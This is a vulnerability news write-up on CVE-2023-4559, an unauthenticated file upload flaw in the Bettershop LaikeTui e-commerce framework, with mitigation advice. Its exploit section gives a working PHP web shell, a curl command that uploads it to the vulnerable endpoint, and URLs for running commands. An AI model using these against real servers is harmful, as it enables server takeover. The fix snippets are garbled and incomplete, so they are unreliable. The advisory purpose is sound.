CVE CyberSecurity Database News

CVE-2023-4559 - Critical Unrestricted File Upload Vulnerability in Bettershop LaikeTui Explored

Poster -

A critical security weakness has been found in Bettershop LaikeTui, a rolling-release e-commerce framework. The vulnerability, tracked as CVE-2023-4559, affects the file upload feature accessible through index.php?module=api&action=user&m=upload via a POST request. This flaw allows attackers to upload arbitrary files without restriction, enabling remote code execution and compromising the entire server. As the platform runs on continuous delivery, affected and patched versions are not clearly stated.

Original Reference:
VulDB: VDB-238160 - Bettershop LaikeTui Unrestricted Upload

What’s the Problem?

The problem lies in the POST request handler for file uploads. There are no effective checks on what types of files can be uploaded. Attackers can send specially crafted requests to this endpoint and upload dangerous files, such as web shells, which the server will then execute whenever these files are accessed.

Remotely exploitable: The flawed upload endpoint is accessible over the internet.

- No authentication: The vulnerability exists before any authentication takes place, or the uploading functionality is exposed to all users, including unauthenticated ones.

Exploiting CVE-2023-4559 (with Example)

Here’s how a typical attack might look. Assume Bettershop LaikeTui is running at example.com.

1. Craft a Malicious PHP Web Shell

<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>

Save this as shell.php on your attacker machine.

Use curl to upload this file

curl -X POST -F 'file=@shell.php' 'http://example.com/index.php?module=api&action=user&m=upload';

3. Find the File’s URL

After upload, many applications respond with the path or make uploads accessible at predictable locations, like /uploads/. Try accessing:

http://example.com/uploads/shell.php

You can now run system commands remotely

http://example.com/uploads/shell.php?cmd=whoami

This command should reveal the web server's user. You now *fully control the server* as that user.

Remote Code Execution: Attackers can run any PHP code on your server.

- Privilege Escalation: Once inside, attackers can look for ways to become root or pivot to other systems.

How to Fix

Since Bettershop LaikeTui uses a rolling release, there are no fixed version numbers. Here’s what administrators must do:

`php

$allowed_types = ['image/jpeg', 'image/png'];

die("Invalid file type.");

}

Move Uploads Outside Web Root:

Save uploads in a directory not accessible from the web, and serve with scripts that never execute uploaded files.

`

RemoveHandler .php .phtml .php3

References & Further Reading

- VulDB: Bettershop LaikeTui Unrestricted Upload
- OWASP Unrestricted File Upload
- PHP: Handling File Uploads

Final Thoughts

CVE-2023-4559 is a classic example of how overlooking file upload validation can lead to a full-system compromise. If you run Bettershop LaikeTui, patch immediately, and never allow user-supplied files to be directly accessible or executable. Always assume attackers will find these weaknesses.

Stay safe, and audit your web application’s upload features frequently!

Timeline

Published on: 08/27/2023 23:15:00 UTC
Last modified on: 08/29/2023 18:16:00 UTC